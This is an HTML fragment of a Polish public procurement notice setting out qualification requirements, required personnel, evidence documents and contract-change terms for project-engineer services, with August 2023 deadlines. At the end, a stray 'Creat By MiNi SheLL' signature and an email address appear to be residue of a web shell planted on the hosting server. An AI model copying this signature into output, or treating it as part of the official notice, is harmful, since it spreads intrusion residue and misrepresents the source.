ekonomicznej lub finansowej:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>1.2.4.	zdolności technicznej lub zawodowej:<br/><br/>1.2.4.1. Zamawiający wymaga, aby Wykonawca nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał w ramach jednej umowy, co najmniej:<br/><br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/><br/>- wykonał należycie minimum 1 usługę polegającą na pełnieniu funkcji Kierownika Projektu, Inżyniera Projektu, Inżyniera Kontraktu lub o innym o charakterze kierowniczym i/lub nadzorczym nad realizacją zakończonego (złożony wniosek o płatność końcową) projektu obejmującego m.in. roboty budowlane w zakresie budowy, przebudowy, modernizacji budynków które były współfinansowane środkami zewnętrznymi, o wartości projektu minimum 5.000.000,00 zł brutto,<br/>- wykonał należycie minimum 2 usługi polegające na pełnieniu funkcji Kierownika Projektu, Inżyniera Projektu, Inżyniera Kontraktu lub o innym o charakterze kierowniczym i/lub nadzorczym nad realizacją zakończonego (złożony wniosek o płatność końcową) projektach współfinansowanych środkami zewnętrznymi dla których były składane wnioski o płatność zaliczkowe, refundacyjne, końcowe o wartości projektu minimum 5 000 000 zł brutto każdego z nich,<br/>- wykonał należycie minimum 3 usługi polegające na opracowaniu dokumentacji zamówień publicznych dla dostaw i świadczeniu usług doradczych dla Zamawiającego w zakresie wyboru Wykonawcy, których wartość dla każdego z zamówień przekracza kwotę 130 000 PLN netto. <br/><br/>1.2.4.2.	Zamawiający wymaga, aby Wykonawca skierował do realizacji zamówienia, następujące osoby:<br/><br/>a)	1 osobę w roli Kierownika Projektu jako osoby zarządzającej zespołem Inżyniera Projektu która:<br/>−	posiada wykształcenie wyższe;<br/>−	pełniła funkcję Kierownika Projektu lub osoby zarządzającej zespołem po stronie Inżyniera Projektu/Inżyniera Kontraktu w minimum 2 zakończonych (złożony wniosek o płatność końcową) projektach lub programach współfinansowanych środkami zewnętrznymi dla których były składane wnioski o płatność zaliczkowe, refundacyjne, końcowe o wartości projektu minimum 5 000 000 zł brutto każdego z nich,<br/>−	pełniła funkcję Kierownika Projektu lub osoby zarządzającej zespołem po stronie Inżyniera Projektu/Inżyniera Kontraktu w minimum 1 projekcie partnerskim obejmujących minimum Lidera i trzech partnerów współfinansowanym środkami zewnętrznymi dla którego były składane wnioski o płatność zaliczkowe, refundacyjne o wartości projektu minimum 5 000 000 zł brutto<br/>−	posiada kwalifikacje potwierdzone certyfikatem metodyki zarządzania projektami zarządzania projektami lub programami rozumianą jako formalnie określony zbiór zasad, procesów, procedur, mechanizmów, technik, standardów, najlepszych praktyk i doświadczeń, określających sposób organizacji, prowadzenia i zarządzania projektami - lub certyfikatami jednostek akredytowanych do ich wydania przez właściciela metody szkolenia np. przez APM Group PRINCE2 Foundation – w przypadku certyfikatu PRINCE2 lub na poziomie podstawowym w metodyce PMI (PMBoK) lub IPMA lub równoważnej, wydany przez akredytowaną jednostkę certyfikującą. <br/><br/>b)	1 osobę w roli specjalisty ds. administracji, która: <br/>−	posiada wykształcenie wyższe;<br/>−	brała udział w realizacji co najmniej 2 zakończonych projektów lub programów o charakterze miękkim, nieinfrastrukturalnym (złożony wniosek o płatność końcową) o wartości projektu minimum 400.000,00 złotych brutto każdy;<br/><br/>c)	1 osobę w roli specjalisty ds. zamówień publicznych, która: <br/>−	posiada wykształcenie wyższe;<br/>−	przygotowała i przeprowadziła co najmniej 3 postępowania o udzielenie zamówienia publicznego na podstawie przepisów ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, które realizowane były w ramach projektów lub programów o charakterze miękkim, nieinfrastrukturalnym.<br/><br/>d)	1 osobę w roli specjalisty ds. prawnych, która: <br/>−	posiada tytuł radcy prawnego albo adwokata<br/><br/>Zamawiający nie dopuszcza łączenia którejkolwiek z funkcji z funkcjami opisanymi w lit. a) oraz b) przez jedną osobę. Zamawiający dopuszcza łączenie funkcji wskazanych w lit. c) i d) przez jedną osobę. <br/><br/>Zamawiający wymaga, aby osoba pełniąca rolę Kierownika Projektu przez cały okres realizacji umowy była zatrudnione przez Wykonawcę na umowę o pracę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących środków dowodowych:<br/>1) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane – załącznik nr 4 do SWZ, oraz załączenie dowodów określających czy usługi te zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez te osoby czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 5 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający nie precyzuje szczegółowych wymagań dotyczących składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia poza wynikającymi z przepisów ustawy Pzp oraz dokumentów zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej, pod rygorem nieważności.<br/>2.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3.	Propozycja zmian umowy inicjowana przez Wykonawcę nie ma charakteru roszczeniowego.<br/>4.	Zakazuje się istotnych zmian postanowień zawartej umowy, o których mowa w 454 ust. 2 ustawy pzp, chyba że zmiana będzie dotyczyła następujących postanowień umowy w zakresie:<br/>a)	zmiany sposobu lub zakresu wykonywania umowy, w tym także rezygnacja z części zamówienia, przy czym minimalny zakres świadczenie Wykonawcy nie może być niższy od 50% całości umowy,<br/>b)	rozszerzenia lub ograniczenia obowiązków Wykonawcy, wchodzących w zakres przedmiotowy umowy, w tym w szczególności zwiększenia zakresu odbioru i utylizacji poszczególnych frakcji odpadów, co w konsekwencji będzie skutkować zimną wynagrodzenia przysługującego Wykonawcy, <br/>c)	zmiany terminów wykonywania usług lub ich części, a także zmiany terminu wykonania umowy,<br/>d)	zastąpienie zakresu planowanych do wykonania usług innym zakresem usług przy zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji umowy,<br/>e)	zmiany zasad finansowania zadania, w szczególności odnośnie terminów płatności i możliwości wystawiania faktur częściowych, a także zmiany innych warunków płatności,<br/>f)	zmiany wynagrodzenia.<br/>Dalsze zapisy w Projekcie Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com